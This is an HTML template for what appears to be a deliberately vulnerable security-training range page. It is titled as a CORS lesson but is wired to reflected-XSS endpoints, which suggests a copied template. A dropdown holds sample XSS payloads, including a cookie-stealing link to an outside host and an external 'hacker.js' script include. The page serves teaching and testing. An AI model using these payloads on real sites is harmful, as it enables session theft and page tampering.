<!DOCTYPE html>
<html xmlns:th="http://www.thymeleaf.org">
<div th:replace="~{common/common::head}"></div>
<body>
<div class="layuimini-container">
    <div class="layuimini-main">
        <div class="layui-row layui-col-space15">
            <div class="layui-col-md12">
                <fieldset class="layui-elem-field layui-field-title">
                    <legend style="color: rgb(30 159 255)">跨源安全问题</legend>
                    <blockquote class="layui-elem-quote layui-quote-nm" style="font-size: 15px;background-color: #a7deefab;box-shadow: 0 .125rem .25rem rgba(0, 0, 0, .075) !important">
                        <p><pre>同源策略(Same Origin Policy)：浏览器为保护用户信息免受不同源的网页访问，实施同源策略，规定只有在协议、域名、端口号三者相同的情况下，一个网页或脚本才能访问另一个网页的内容。</pre></p>
                        <p><pre>实际上很多场景还是需要进行跨源访问操作(前后端分离、调用第三方接口)，常用的有以下几种跨域解决方法：CORS、JSONP、PostMessge、WebSockets、代理服务器。</pre></p>
                        <p><pre>不过提供便利的同时也伴随着一些安全问题……</pre></p>
                    </blockquote>
                </fieldset>
            </div>

            <div class="layui-col-md12" style="margin-top: 10px">
                <div class="layui-row layui-col-space15">
                    <div class="layui-col-md6">
                        <h1><span class="iconfont icon-bug">  漏洞环境：跨域资源共享-CORS</span></h1>
                        <div class="layui-tab layui-tab-brief">
                            <ul class="layui-tab-title">
                                <li class="layui-this">GET型</li>
                                <li>POST型</li>
                                <li>String</li>

                            </ul>
                            <div class="layui-tab-content">
                                <div class="layui-tab-item layui-show">
                                    <blockquote class="layui-elem-quote main_btn">
                                        <form class="layui-form" style="display: flex; justify-content: space-between;">
                                            <div style="display: flex; align-items: center;">
                                                <input type="text" name="content" style="width: 300px;" required
                                                       lay-verify="required" placeholder="请求内容" autocomplete="off"
                                                       class="layui-input" id="vul1-reflect-raw-get-input">
                                            </div>
                                            <div style="display: flex; align-items: center;">
                                                <select class="layui-form-select"
                                                        style="background-color: #5eb878;!important;"
                                                        lay-filter="vul1-reflect-raw-get">
                                                    <option value="">示例Payload</option>
                                                    <option value="123&lt;u&gt;A&lt;/u&gt;123">探测漏洞标签</option>
                                                    <option value="重定向恶意网站-SEO引流&lt;a href=javascript:window.location.href=&#x27;http://baidu.com&#x27;&gt;Click Me&lt;/a&gt;">
                                                        恶意流量劫持
                                                    </option>
                                                    <option value="&lt;a href=&#x27;http://whgojp.com:5555/receive?cookie=&#x27;+document.cookie target=&#x27;_blank&#x27;&gt;点击查看&lt;/a&gt;&lt;script src=&#x27;http://whgojp.com:8080/js/hacker.js&#x27;&gt;&lt;/script&gt;">
                                                        窃取用户信息
                                                    </option>
                                                    <option value="修改背景颜色为红色&lt;img src onerror=javascript:document.body.style.backgroundColor=&#x27;red&#x27;&gt;">
                                                        篡改网页内容
                                                    </option>

                                                </select>
                                                <button class="layui-btn layui-btn-normal"
                                                        style="width: 100px; margin-left: 10px;"
                                                        lay-filter="vul1-reflect-raw-get" lay-submit="">
                                                    <span class="iconfont icon-zhihang">Run</span>
                                                </button>
                                            </div>
                                        </form>
                                    </blockquote>
                                </div>

                                <div class="layui-tab-item">
                                    <blockquote class="layui-elem-quote main_btn">
                                        <form class="layui-form" style="display: flex; justify-content: space-between;">
                                            <div style="display: flex; align-items: center;">
                                                <input type="text" name="content" style="width: 300px;" required
                                                       lay-verify="required" placeholder="请求内容" autocomplete="off"
                                                       class="layui-input">
                                            </div>
                                            <div style="display: flex; align-items: center;">
                                                <button class="layui-btn layui-btn-normal"
                                                        style="width: 100px; margin-left: 10px;"
                                                        lay-filter="vul1-reflect-raw-post" lay-submit="">
                                                    <span class="iconfont icon-zhihang">Run</span>
                                                </button>
                                            </div>
                                        </form>
                                    </blockquote>
                                </div>

                                <div class="layui-tab-item">
                                    <blockquote class="layui-elem-quote main_btn">
                                        <div style="display: flex; align-items: center;">
                                            <p> Controller接口返回的数据是String类型</p>
                                        </div>
                                        <div style="display: flex; align-items: center;">
                                            <a target="_blank"
                                               href="/xss/reflect/a-vul1-reflect-raw-string?content=%3Cscript%3Ealert(/xss/)%3C/script%3E">
                                                <button class="layui-btn layui-btn-normal"
                                                        style="width: 100px; margin-left: 10px;">
                                                    <span class="iconfont icon-zhihang">Run</span>
                                                </button>
                                            </a>
                                        </div>
                                    </blockquote>
                                </div>
                                <div class="layui-col-md12">
                                    <div class="layui-card">
                                        <div class="layui-card-header"><i class="fa fa-bullhorn icon-tip"></i>tips</div>
                                        <div class="layui-card-body layui-text layadmin-text">
                                            <pre style="color: #28333e;font-size: 15px;">CORS：WEB应用通过在HTTP增加字段来告诉浏览器，哪些不同来源的服务器是有权限访问本站资源，当不同域的请求发生时，就出现了跨域的现象
CORS漏洞：利用CORS绕过同源策略从而窃取用户敏感数据，CORS漏洞的原因是服务端配置的规则不当所导致的，服务器端没有配置Access-Control-Allow-Origin等字段
</pre>
                                        </div>
                                    </div>
                                </div>
                                <div class="layui-col-md12">
                                    <div class="layui-card">
                                        <div class="layui-card-header"><i class="fa fa-warning icon-output"></i>测试结果</div>
                                        <div class="layui-card-body layui-text layadmin-text">
                                            <pre id="vul1-reflect-raw-result" style="color: red;font-size: 15px;"></pre>
                                        </div>
                                    </div>
                                </div>

                            </div>
                        </div>
                    </div>

                    <div class="layui-col-md6">
                        <h1><span class="iconfont icon-code">  缺陷代码</span></h1>
                        <div class="m-auto div-shadow shadow p-3 mb-5 bg-white rounded">
                            <div class="code-editor" id="vul1ReflectRaw">
                            </div>
                        </div>
                    </div>

                </div>
            </div>

        </div>
    </div>
</div>
</div>

<script type="text/javascript">
    layui.use(['layer', 'miniTab', 'common'], function () {
        var $ = layui.jquery,
            layer = layui.layer,
            miniTab = layui.miniTab,
            common = layui.common;
        miniTab.listen();
        layer.msg("跨站脚本-反射型")

        common.formListenFun("vul1-reflect-raw-get", "", "/xss/reflect/a-vul1-reflect-raw", "vul1-reflect-raw-result", "get");
        common.formListenFun("vul1-reflect-raw-post", "", "/xss/reflect/a-vul1-reflect-raw", "vul1-reflect-raw-result", "post");
        common.selectListenFun("vul1-reflect-raw-get", "vul1-reflect-raw-get-input")

        common.formListenFun("safe1-CheckUserInput-front", "frontEnd", "/xss/reflect/a-safe1-CheckUserInput", "safe1-CheckUserInput-result", "get");
        common.formListenFun("safe1-CheckUserInput-back", "backEnd", "/xss/reflect/a-safe1-CheckUserInput", "safe1-CheckUserInput-result", "get");
        common.selectListenFun("safe1-CheckUserInput-front", "safe1-CheckUserInput-front-input")


        var cmConfig = {
            lineNumbers: true,
            lineWrapping: false,
            indentUnit: 4,
            indentWithTabs: true,
            theme: 'juejin',
            styleActiveLine: {nonEmpty: true},
            fontSize: "18px",
            mode: "text/x-java"
        };

        CodeMirror(document.getElementById("vul1ReflectRaw"), Object.assign({}, cmConfig, {
            value: vul1ReflectRaw
        }));
        CodeMirror(document.getElementById("vul2ReflectContentType"), Object.assign({}, cmConfig, {
            value: vul2ReflectContentType
        }));
        CodeMirror(document.getElementById("safe1CheckUserInput"), Object.assign({}, cmConfig, {
            value: safe1CheckUserInput
        }));
        CodeMirror(document.getElementById("safe2CSP"), Object.assign({}, cmConfig, {
            value: safe2CSP
        }));

    });

</script>

</body>
</html>
